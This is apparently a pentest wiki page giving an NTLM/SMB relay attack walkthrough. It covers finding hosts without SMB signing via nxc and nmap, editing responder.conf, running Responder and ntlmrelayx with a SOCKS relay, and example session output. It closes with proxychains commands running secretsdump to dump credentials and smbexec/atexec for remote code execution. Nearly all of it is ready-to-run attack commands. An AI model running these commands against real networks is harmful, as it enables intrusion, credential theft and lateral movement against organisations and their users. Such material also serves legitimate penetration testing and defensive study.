BuyMeACoffee

SMBRelay

Brief

Instead of cracking hashes to find the clear password, you can relay those hashes to specific machines and potentially gain access.

LogoPass the Hash AttackNetwrix

Now, this attack requires two things :

  • SMB signing must be disabled on the target (NOTE: by default, SMB Signing is enabled on all DC servers)

  • Relayed user credentials must be admin on the machine (we can't relay the hash to the same machine since MS08-068, and the user we're relaying must have admin rights on the target machine if we want code execution otherwise user access if there's an open-share for example)

Attack

In order to relay hashes, we must have valid targets. Valid targets are, as predescribed, machines with SMB Signing disabled. So to get a list of those valide targets we can use for example CrackMapExec :

nxc smb $network_ip/$cidr --gen-relay-list Targets.txt
# or
nmap --script=smb2-security-mode.nse -p445 $network_ip

Now off to capture the hashes, but we first need to change a little configuration in the responder.conf file (/usr/share/responder/responder.conf) :

[Responder Core]

; Servers to start
SQL = On
SMB = Off     # Turn this off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off    # Turn this off
HTTPS = On
DNS = On
LDAP = On

# then :
python responder.py -I $interface -rdwv

# pop new shell
# ntlmrelayx to relay the intercepted hashes
ntlmrelayx.py -tf Targets.txt -socks -smb2support

# output should be like :
ntlmrelayx> socks
Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
SMB       192.168.48.38   VULNERABLE/NORMALUSER3    445
MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433
SMB       192.168.48.230  VULNERABLE/ADMINISTRATOR  445
SMB       192.168.48.230  CONTOSO/NORMALUSER1       445
SMTP      192.168.48.224  VULNERABLE/NORMALUSER3    25
SMTP      192.168.48.224  CONTOSO/NORMALUSER1       25
IMAP      192.168.48.224  CONTOSO/NORMALUSER1       143

Interact with ntmlrelayx sessions

Proxychains

# edit /etc/proxychains.conf
[ProxyList]
socks4 $your_ip 1080

Retrieve hashes

proxychains ./secretsdump.py $domain/$username@$ip
# or get code execution
proxychains smbexec.py $domain/$user@$ip
proxychains atexec.py $domain/$user@$ip "<cmd>"
PreviousNetworkNextLLMNR_NBT NS Poisoning

Last updated

Was this helpful?